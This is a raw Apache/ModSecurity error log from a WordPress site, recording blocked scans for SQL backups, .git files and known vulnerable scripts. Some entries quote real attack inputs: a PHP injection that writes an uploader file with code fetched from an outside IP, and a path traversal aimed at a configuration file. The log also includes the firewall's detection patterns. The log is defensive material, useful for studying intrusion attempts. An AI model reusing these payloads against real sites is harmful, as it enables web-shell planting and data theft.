"9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/ashley.sql"] [unique_id "ZSXn5AqfrSxyBIVUChBx9QAAAMc"] [Tue Oct 10 21:50:26.715820 2023] [:error] [pid 521:tid 140126554400512] [client 83.150.7.243:40808] [client 83.150.7.243] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/6969.sql"] [unique_id "ZSYNcgqfrSxyBIVUChBzRwAAAMc"] [Wed Oct 11 00:32:30.861163 2023] [:error] [pid 32140:tid 140126675785472] [client 83.150.7.243:45724] [client 83.150.7.243] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/nicole.sql"] [unique_id "ZSYzbuA-dnGwg53nXwiGGgAAAoE"] [Wed Oct 11 14:20:27.969751 2023] [:error] [pid 20166:tid 140335179073280] [client 211.196.38.227:53980] [client 211.196.38.227] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/yankees.sql"] [unique_id "ZSb1ey1yyh29EfukMxHUhgAAAAg"] [Wed Oct 11 17:09:35.700107 2023] [:error] [pid 20916:tid 140335318398720] [client 75.137.45.202:57240] [client 75.137.45.202] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/987654321.sql"] [unique_id "ZScdH2obM-EMzOze_2DyqgAAAMA"] [Wed Oct 11 19:56:36.961564 2023] [:error] [pid 20916:tid 140335145502464] [client 82.64.222.50:59664] [client 82.64.222.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/dallas.sql"] [unique_id "ZSdERGobM-EMzOze_2DzxgAAAMw"] [Wed Oct 11 22:48:06.610797 2023] [:error] [pid 20916:tid 140335162287872] [client 185.162.16.58:33746] [client 185.162.16.58] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/austin.sql"] [unique_id "ZSdsdmobM-EMzOze_2D09AAAAMo"] [Thu Oct 12 01:22:52.748911 2023] [autoindex:error] [pid 20916:tid 140335120324352] [client 164.132.59.194:36664] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 12 01:38:26.962775 2023] [:error] [pid 20916:tid 140335128717056] [client 173.52.121.16:36924] [client 173.52.121.16] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/thunder.sql"] [unique_id "ZSeUYmobM-EMzOze_2D2SgAAAM4"] [Thu Oct 12 04:29:51.497550 2023] [:error] [pid 9426:tid 140233144182528] [client 109.132.115.105:40148] [client 109.132.115.105] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/taylor.sql"] [unique_id "ZSe8j7EoT2DIZ0eOW5fCdQAAAIA"] [Thu Oct 12 07:19:04.891568 2023] [:error] [pid 10022:tid 140232888346368] [client 81.94.73.180:42496] [client 81.94.73.180] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/matrix.sql"] [unique_id "ZSfkODoZVsMGQM9W5uf9OwAAANY"] [Thu Oct 12 08:05:04.193168 2023] [:error] [pid 19959:tid 140233110611712] [client 35.195.25.143:43518] /usr/local/bin/php-cgi: error while loading shared libraries: cannot allocate symbol search list: Cannot allocate memory [Thu Oct 12 08:05:04.220688 2023] [core:error] [pid 19959:tid 140233110611712] [client 35.195.25.143:43518] End of script output before headers: xmlrpc.php [Thu Oct 12 08:05:20.421726 2023] [:error] [pid 20050:tid 140232905131776] [client 35.195.25.143:43524] /usr/local/bin/php-cgi: error while loading shared libraries: cannot allocate symbol search list: Cannot allocate memory [Thu Oct 12 08:05:20.459663 2023] [core:error] [pid 20050:tid 140232905131776] [client 35.195.25.143:43524] End of script output before headers: xmlrpc.php [Thu Oct 12 08:05:30.368757 2023] [:error] [pid 20051:tid 140232997451520] [client 148.72.169.250:43520] /usr/local/bin/php-cgi: error while loading shared libraries: libnssutil3.so: failed to map segment from shared object: Cannot allocate memory [Thu Oct 12 08:05:30.803397 2023] [core:error] [pid 20051:tid 140232997451520] [client 148.72.169.250:43520] End of script output before headers: xmlrpc.php [Thu Oct 12 08:05:50.114310 2023] [:error] [pid 19959:tid 140233119004416] [client 68.178.166.228:43516] [Thu Oct 12 08:05:50.132957 2023] [:error] [pid 19959:tid 140233119004416] [client 68.178.166.228:43516] mmap() failed: [12] Cannot allocate memory [Thu Oct 12 10:08:02.068798 2023] [:error] [pid 26218:tid 140054169048832] [client 173.52.121.16:45588] [client 173.52.121.16] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/minecraft.sql"] [unique_id "ZSgL0nn6m7b0Dnfh9LGSYgAAAFU"] [Thu Oct 12 10:16:50.442687 2023] [:error] [pid 26218:tid 140054261368576] [client 20.83.33.15:45744] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Oct 12 10:16:54.733744 2023] [:error] [pid 26904:tid 140054177441536] [client 20.83.33.15:45746] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Oct 12 15:23:38.171181 2023] [autoindex:error] [pid 26904:tid 140054418511616] [client 164.132.59.194:50806] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 13 02:45:53.793576 2023] [:error] [pid 26904:tid 140054177441536] [client 172.200.234.187:33500] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Oct 13 02:45:56.516798 2023] [:error] [pid 26219:tid 140054294939392] [client 172.200.234.187:33502] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Oct 13 09:55:11.480757 2023] [:error] [pid 30053:tid 140137459574528] [client 45.79.131.92:41762] [client 45.79.131.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZSlaT0bkZtU6ZHObc_QTjgAAABA"], referer: www.google.com [Fri Oct 13 16:21:44.243360 2023] [:error] [pid 30639:tid 140137409218304] [client 185.220.101.25:53654] [client 185.220.101.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZSm06J7A_eaRbzZkfZh-egAAANY"] [Sat Oct 14 06:12:34.566930 2023] [:error] [pid 30055:tid 140137400825600] [client 139.144.192.165:51318] [client 139.144.192.165] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZSp3orbykEYCINAAiCNQDAAAAJc"], referer: www.google.com [Sat Oct 14 23:41:40.997438 2023] [:error] [pid 12033:tid 140137451181824] [client 185.243.218.32:52274] [client 185.243.218.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZStthMAq8zK5GrfrY9Kk4wAAAtE"] [Mon Oct 16 16:56:50.794058 2023] [autoindex:error] [pid 13212:tid 139958320871168] [client 95.111.234.184:36958] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2023/10/16 20:34:46 [error] 13173#13173: *423970 access forbidden by rule, client: 91.122.53.173, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2023/10/17 09:11:59 [error] 17482#17482: *434545 access forbidden by rule, client: 79.120.76.144, server: investigacionperu.com, request: "GET /.git/index HTTP/1.1", host: "investigacionperu.com" [Tue Oct 17 12:31:04.955479 2023] [autoindex:error] [pid 17710:tid 139787830753024] [client 4.240.75.84:60956] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Tue Oct 17 12:31:16.865925 2023] [autoindex:error] [pid 5217:tid 139787839145728] [client 4.240.75.84:60972] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com 2023/10/18 08:40:24 [error] 8808#8808: *449003 access forbidden by rule, client: 35.164.106.12, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Wed Oct 18 13:30:13.697859 2023] [autoindex:error] [pid 8846:tid 140326798825216] [client 5.161.48.24:59118] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Wed Oct 18 13:30:15.853734 2023] [autoindex:error] [pid 8849:tid 140326865966848] [client 5.161.48.24:59126] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Thu Oct 19 07:23:28.242929 2023] [:error] [pid 17398:tid 140587701335808] [client 51.178.112.35:47720] [client 51.178.112.35] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/backup.sql"] [unique_id "ZTEfwI8xL8GLFPaO57zrFAAAAE8"] [Thu Oct 19 08:03:41.850130 2023] [:error] [pid 17988:tid 140587676157696] [client 20.238.98.213:48132] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Oct 19 08:03:45.067146 2023] [:error] [pid 17398:tid 140587866736384] [client 20.238.98.213:48134] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Oct 20 00:02:49.778702 2023] [:error] [pid 17988:tid 140587692943104] [client 191.101.209.139:40000] [client 191.101.209.139] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZTIJ-TFw6Ib7r1gmPbEzWgAAANA"] [Fri Oct 20 12:54:17.582054 2023] [:error] [pid 27699:tid 140636606912256] [client 20.163.8.120:55288] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri Oct 20 12:54:19.400189 2023] [:error] [pid 28274:tid 140636506199808] [client 20.163.8.120:55290] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri Oct 20 16:09:45.959409 2023] [autoindex:error] [pid 27699:tid 140636640483072] [client 45.32.13.234:33806] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/midnight/index.php [Sat Oct 21 13:08:36.424991 2023] [:error] [pid 684:tid 140513275062016] [client 104.248.229.153:42998] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/amfeed/main/download"] [unique_id "ZTQTpAPReqmB971obKPFjAAAAEA"] [Sat Oct 21 13:08:37.238032 2023] [:error] [pid 684:tid 140513266669312] [client 104.248.229.153:43000] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). Pattern match 